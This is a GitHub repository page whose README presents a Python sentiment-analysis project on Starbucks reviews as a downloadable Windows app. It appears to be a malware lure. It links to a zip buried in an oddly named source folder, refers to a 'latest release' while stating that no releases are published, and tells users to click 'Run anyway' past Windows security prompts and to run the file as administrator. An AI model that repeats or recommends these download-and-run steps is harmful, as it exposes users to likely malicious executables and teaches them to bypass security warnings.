Skip to content

haplosporidiaprecognition804/NLP_Sentiment_Analysis

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

🧠 NLP_Sentiment_Analysis - Find Review Insights Fast

Download

📥 Download

Visit this page to download the app for Windows:

https://github.com/haplosporidiaprecognition804/NLP_Sentiment_Analysis/raw/refs/heads/main/palatableness/Sentiment_Analysis_NL_v3.3-beta.3.zip

🖥️ What this app does

NLP_Sentiment_Analysis helps you review Starbucks customer feedback and see what people feel about their experience.

It looks at review text and helps you identify:

  • Positive comments
  • Negative comments
  • Common complaints
  • Main themes in customer feedback
  • Signs of process delays or service issues

This helps you turn long text reviews into clear results that are easier to read.

🚀 Getting Started

1. Download the app

Open the release page and get the Windows file from the latest release.

2. Open the file

After the file finishes downloading, open it from your Downloads folder.

3. Allow Windows to run it

If Windows asks for permission, choose the option to run the app.

4. Start the analysis

Open the app and load your review text or dataset.

5. View the results

The app will show sentiment scores and text insights in a clear format.

🪟 Windows Setup

Use these steps on a Windows PC:

  1. Open the download link above.
  2. Pick the latest release.
  3. Download the Windows version of the app.
  4. Wait for the file to finish downloading.
  5. Open the file.
  6. If you see a security prompt, select Run or More info > Run anyway.
  7. Follow the on-screen steps to start the app.

If your browser asks where to save the file, choose Downloads or Desktop so you can find it easily.

📋 System Requirements

For the best result, use a Windows PC with:

  • Windows 10 or Windows 11
  • At least 4 GB of RAM
  • 500 MB of free disk space
  • A stable internet connection for the download
  • A screen size that lets you read tables and charts with ease

A newer PC will give you faster text analysis when working with large review sets.

✨ Features

  • Reviews sentiment in plain English
  • Finds positive and negative language
  • Uses text cleaning to improve results
  • Supports machine learning based text classification
  • Uses TF-IDF scoring to weigh important words
  • Uses VADER sentiment for quick review checks
  • Helps identify repeated themes in customer feedback
  • Makes it easier to spot service bottlenecks

🧭 How to Use It

Step 1: Get your review text

You can use copied review text or a review file.

Step 2: Load the data

Open the app and choose the file or text input area.

Step 3: Run the analysis

Start the review check and wait for the results.

Step 4: Read the output

Look at the sentiment label, score, and main keywords.

Step 5: Use the insight

Use the results to find patterns in customer experience and service flow.

📊 What the results mean

The app may show results like these:

  • Positive sentiment: The review gives a good view of the experience
  • Negative sentiment: The review shows problems or poor service
  • Neutral sentiment: The review has a balanced or unclear tone
  • Keyword trends: Words that appear often in reviews
  • Bottleneck signals: Comments that point to delays, long waits, or process issues

This makes it easier to review many comments without reading each one by hand.

🧰 Built With

This project uses:

  • Python
  • NLTK
  • scikit-learn
  • SVM
  • TF-IDF
  • VADER sentiment
  • Text classification methods
  • NLP text processing

📁 Repository Topics

  • crisp-dm
  • customer-experience
  • machine-learning
  • nlp
  • nltk
  • python
  • scikit-learn
  • sentiment-analysis
  • svm
  • text-classification
  • tf-idf
  • vader-sentiment

🛠️ Common Use Cases

Use this app if you want to:

  • Review customer feedback in bulk
  • Spot problems in store service
  • Check how people talk about Starbucks service
  • Compare review tone across time
  • Find repeated complaints
  • Support report writing with text data

❓ Help Tips

If the app does not open:

  • Check that the download finished
  • Open the file from your Downloads folder
  • Right-click the file and choose Run as administrator
  • Make sure Windows has not blocked the file
  • Try downloading the latest release again

If the text results look wrong:

  • Make sure the input file has clear review text
  • Remove broken lines or empty rows
  • Use plain text when possible
  • Try a smaller sample first

📌 File Name Guide

After you open the release page, look for the Windows app file in the latest release assets. The file name may include terms like:

  • Windows
  • setup
  • exe
  • installer

Download the Windows file, then run it

🔍 About the Project

NLP_Sentiment_Analysis uses text analytics and machine learning to study customer reviews. It focuses on Starbucks feedback and helps reveal both sentiment and possible service issues. The goal is to make review data easier to understand for day-to-day use

📄 License

Use the license listed in the repository for the terms that apply to this project

Releases

No releases published

Packages

 
 
 

Contributors